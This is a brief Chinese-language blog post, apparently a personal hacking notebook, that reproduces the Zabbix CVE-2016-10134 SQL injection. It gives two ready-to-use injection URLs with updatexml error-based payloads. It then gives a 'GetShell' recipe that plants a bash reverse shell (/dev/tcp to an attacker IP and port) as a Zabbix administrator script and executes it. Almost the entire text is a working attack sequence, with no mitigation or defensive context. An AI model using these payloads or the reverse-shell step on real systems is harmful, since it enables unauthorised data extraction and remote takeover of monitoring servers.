Zabbix

1.漏洞复现

CVE-2016-10134 SQL注入

影响范围：Zabbix 2.2.x、3.0.0 - 3.0.3

漏洞页面1：

GET请求进行SQL注入，/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

漏洞页面2：

登录(可能可以以Guest登录)，GET请求进行SQL注入，/latest.php?output=ajax&sid=Cookie的zbx_sessionid后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

GetShell

zabbix_agentd.conf配置了EnableRemoteCommands=1

以管理员登录，Administration->Scripts->Create script->名称随意、内容bash -i >& /dev/tcp/IP/端口 0>&1->add

Monitoring->Latest data->找到脚本执行

posted @ 2023-01-17 01:15 Hacker&Cat 阅读(32) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Hacker&Cat

Zabbix

公告